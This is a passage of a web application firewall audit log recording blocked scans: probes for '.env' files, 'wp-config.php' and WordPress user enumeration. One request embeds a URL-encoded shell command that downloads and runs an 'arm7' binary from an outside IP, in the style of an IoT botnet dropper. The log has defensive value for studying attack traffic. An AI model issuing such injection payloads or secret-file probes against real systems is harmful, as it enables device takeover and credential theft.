X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --34c45516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34c45516-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745527560556398 688 (- - -) Stopwatch2: 1745527560556398 688; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34c45516-Z-- --8b8dc04b-A-- [25/Apr/2025:03:58:04 +0700] aAql3OOdEP6frSVs8CofwQAAAAo 103.236.140.4 54138 103.236.140.4 8181 --8b8dc04b-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F212.18.104.182%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=admin X-Real-IP: 5.183.209.244 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 5.183.209.244 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --8b8dc04b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b8dc04b-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745528284666643 903 (- - -) Stopwatch2: 1745528284666643 903; combined=395, p1=344, p2=0, p3=0, p4=0, p5=51, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b8dc04b-Z-- --1c47940c-A-- [25/Apr/2025:04:15:09 +0700] aAqp3T8HMZgF-3Y3GtE3AAAAAEo 103.236.140.4 58182 103.236.140.4 8181 --1c47940c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.236.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.236.146 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1c47940c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c47940c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745529309094528 879 (- - -) Stopwatch2: 1745529309094528 879; combined=373, p1=334, p2=0, p3=0, p4=0, p5=39, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c47940c-Z-- --a2c47b02-A-- [25/Apr/2025:04:56:19 +0700] aAqzgz8HMZgF-3Y3GtE5NQAAAEQ 103.236.140.4 39476 103.236.140.4 8181 --a2c47b02-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.189.200.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.189.200.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2c47b02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2c47b02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745531779393006 2706 (- - -) Stopwatch2: 1745531779393006 2706; combined=1510, p1=444, p2=1035, p3=0, p4=0, p5=31, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2c47b02-Z-- --12f21b2b-A-- [25/Apr/2025:05:03:40 +0700] aAq1POXF4ZX3hX-IbN6ZtwAAAJY 103.236.140.4 41206 103.236.140.4 8181 --12f21b2b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 143.244.168.161 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --12f21b2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12f21b2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745532220560083 872 (- - -) Stopwatch2: 1745532220560083 872; combined=347, p1=310, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12f21b2b-Z-- --6a434c26-A-- [25/Apr/2025:05:13:45 +0700] aAq3meOdEP6frSVs8CokmAAAABc 103.236.140.4 43562 103.236.140.4 8181 --6a434c26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.99.63.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.99.63.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6a434c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a434c26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745532825415492 3253 (- - -) Stopwatch2: 1745532825415492 3253; combined=1409, p1=443, p2=936, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a434c26-Z-- --68f10a6b-A-- [25/Apr/2025:05:29:04 +0700] aAq7MD8HMZgF-3Y3GtE77gAAAEU 103.236.140.4 48548 103.236.140.4 8181 --68f10a6b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.23.218.208 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --68f10a6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68f10a6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745533744823561 753 (- - -) Stopwatch2: 1745533744823561 753; combined=283, p1=251, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68f10a6b-Z-- --2e509e42-A-- [25/Apr/2025:05:29:05 +0700] aAq7MT8HMZgF-3Y3GtE77wAAAEY 103.236.140.4 48550 103.236.140.4 8181 --2e509e42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.250.95.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.250.95.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e509e42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e509e42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745533745708489 2534 (- - -) Stopwatch2: 1745533745708489 2534; combined=1194, p1=405, p2=762, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e509e42-Z-- --8462472a-A-- [25/Apr/2025:05:32:14 +0700] aAq77uOdEP6frSVs8ComegAAAAs 103.236.140.4 50486 103.236.140.4 8181 --8462472a-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.180.248 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --8462472a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8462472a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745533934108173 891 (- - -) Stopwatch2: 1745533934108173 891; combined=371, p1=334, p2=0, p3=0, p4=0, p5=37, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8462472a-Z-- --1a63cc38-A-- [25/Apr/2025:05:32:14 +0700] aAq77vKu9d5eAb6Kn9_gMQAAANY 103.236.140.4 50488 103.236.140.4 8181 --1a63cc38-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.180.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1a63cc38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a63cc38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745533934131995 719 (- - -) Stopwatch2: 1745533934131995 719; combined=280, p1=251, p2=0, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a63cc38-Z-- --ea08c009-A-- [25/Apr/2025:05:33:04 +0700] aAq8IOXF4ZX3hX-IbN6c9AAAAJc 103.236.140.4 51056 103.236.140.4 8181 --ea08c009-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.6.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.6.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ea08c009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea08c009-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745533984546279 2583 (- - -) Stopwatch2: 1745533984546279 2583; combined=1332, p1=421, p2=881, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea08c009-Z-- --32737b11-A-- [25/Apr/2025:05:42:21 +0700] aAq-TeXF4ZX3hX-IbN6elQAAAJI 103.236.140.4 57680 103.236.140.4 8181 --32737b11-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.180.248 Accept-Encoding: gzip X-Varnish: 137399906 --32737b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32737b11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745534541311221 866 (- - -) Stopwatch2: 1745534541311221 866; combined=356, p1=317, p2=0, p3=0, p4=0, p5=39, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32737b11-Z-- --916b7402-A-- [25/Apr/2025:05:42:21 +0700] aAq-TeXF4ZX3hX-IbN6elgAAAJM 103.236.140.4 57684 103.236.140.4 8181 --916b7402-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.180.248 Accept-Encoding: gzip X-Varnish: 137319573 --916b7402-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --916b7402-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745534541330263 645 (- - -) Stopwatch2: 1745534541330263 645; combined=255, p1=225, p2=0, p3=0, p4=0, p5=29, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916b7402-Z-- --40ef6125-A-- [25/Apr/2025:05:47:13 +0700] aAq_cT8HMZgF-3Y3GtE_fQAAAEI 103.236.140.4 59132 103.236.140.4 8181 --40ef6125-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.129.169.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.129.169.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --40ef6125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40ef6125-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745534833854478 3237 (- - -) Stopwatch2: 1745534833854478 3237; combined=1329, p1=435, p2=865, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40ef6125-Z-- --2e8daa7b-A-- [25/Apr/2025:06:10:52 +0700] aArE_PKu9d5eAb6Kn9_jmgAAAMI 103.236.140.4 36480 103.236.140.4 8181 --2e8daa7b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.192.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.192.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e8daa7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e8daa7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745536252731626 15613 (- - -) Stopwatch2: 1745536252731626 15613; combined=26052, p1=501, p2=905, p3=0, p4=0, p5=12338, sr=119, sw=0, l=0, gc=12308 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e8daa7b-Z-- --73421646-A-- [25/Apr/2025:06:31:23 +0700] aArJy_Ku9d5eAb6Kn9_k1wAAAMM 103.236.140.4 41264 103.236.140.4 8181 --73421646-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.81.24.74 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --73421646-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73421646-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745537483220327 772 (- - -) Stopwatch2: 1745537483220327 772; combined=333, p1=297, p2=0, p3=0, p4=0, p5=36, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73421646-Z-- --b084356f-A-- [25/Apr/2025:07:07:21 +0700] aArSOT8HMZgF-3Y3GtFG7gAAAFE 103.236.140.4 59374 103.236.140.4 8181 --b084356f-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 138.68.86.32 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 138.68.86.32 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b084356f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b084356f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745539641489172 826 (- - -) Stopwatch2: 1745539641489172 826; combined=278, p1=240, p2=0, p3=0, p4=0, p5=38, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b084356f-Z-- --72a16f25-A-- [25/Apr/2025:09:00:00 +0700] aArsoOXF4ZX3hX-IbN62XAAAAI0 103.236.140.4 57230 103.236.140.4 8181 --72a16f25-B-- SSTP_DUPLEX_POST /sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/ HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.124.180.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.124.180.157 X-Forwarded-Proto: https Connection: close Accept: */* --72a16f25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72a16f25-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?i:(?:[a-z]{3,10}\\s+(?:\\w{3,7}?://[\\w\\-\\./]*(?::\\d+)?)?/[^?#]*(?:\\?[^#\\s]*)?(?:#[\\S]*)?|connect (?:\\d{1,3}\\.){3}\\d{1,3}\\.?(?::\\d+)?|options \\*)\\s+[\\w\\./]+|get /[^?#]*(?:\\?[^#\\s]*)?(?:#[\\S]*)?)$" against "REQUEST_LINE" required. 
